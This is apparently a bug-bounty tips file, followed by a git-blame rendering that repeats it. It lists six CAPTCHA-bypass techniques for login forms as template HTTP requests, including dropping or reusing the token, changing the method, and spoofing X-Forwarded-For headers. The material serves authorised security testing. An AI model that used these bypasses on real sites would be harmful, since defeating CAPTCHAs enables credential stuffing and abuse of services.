AllAboutBugBounty/Bypass/Bypass Captcha.md

# Bypass Captcha (Google reCAPTCHA)

1. Try changing the request method, for example POST to GET
```
POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```

Change the method to GET
```
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: target.com
...
```

2. Try remove the value of the captcha parameter
```
POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=&_Username=daffa&_Password=test123
```

3. Try reuse old captcha token
```
POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
```

4. Convert JSON data to normal request parameter
```
POST / HTTP 1.1
Host: target.com
...

{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
```
Convert to normal request
```
POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```

5. Try custom header to bypass captcha
```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
```

6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.
```
POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
Try this to bypass
```
POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
```
Add 'Where to find' in each readme, add Apache + CRLF + RFI 2022-06-22 04:41:21 +00:00			`# Bypass Captcha (Google reCAPTCHA)`
Update structure each readme 2022-06-15 10:38:42 +00:00
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00			`1. Try changing the request method, for example POST to GET`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00
			`_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123`
			```

			`Change the method to GET`
			```
			`GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00			```

			`2. Try remove the value of the captcha parameter`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00
			`_RequestVerificationToken=&_Username=daffa&_Password=test123`
			```

			`3. Try reuse old captcha token`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00
			`_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123`
			```

			`4. Convert JSON data to normal request parameter`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00
			`{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}`
			```
			`Convert to normal request`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass Captcha [1] Create bypass captcha tips and add 5 tips 2020-09-16 03:00:24 +00:00
			`_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123`
			```

			`5. Try custom header to bypass captcha`
			```
			`X-Originating-IP: 127.0.0.1`
			`X-Forwarded-For: 127.0.0.1`
			`X-Remote-IP: 127.0.0.1`
			`X-Remote-Addr: 127.0.0.1`
			```
Daffa / Update bypass captcha 2021-02-02 09:51:10 +00:00
			`6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Daffa / Update bypass captcha 2021-02-02 09:51:10 +00:00
			`_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123`
			```
			`Try this to bypass`
			```
			`POST / HTTP 1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Daffa / Update bypass captcha 2021-02-02 09:51:10 +00:00
			`_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123`
			```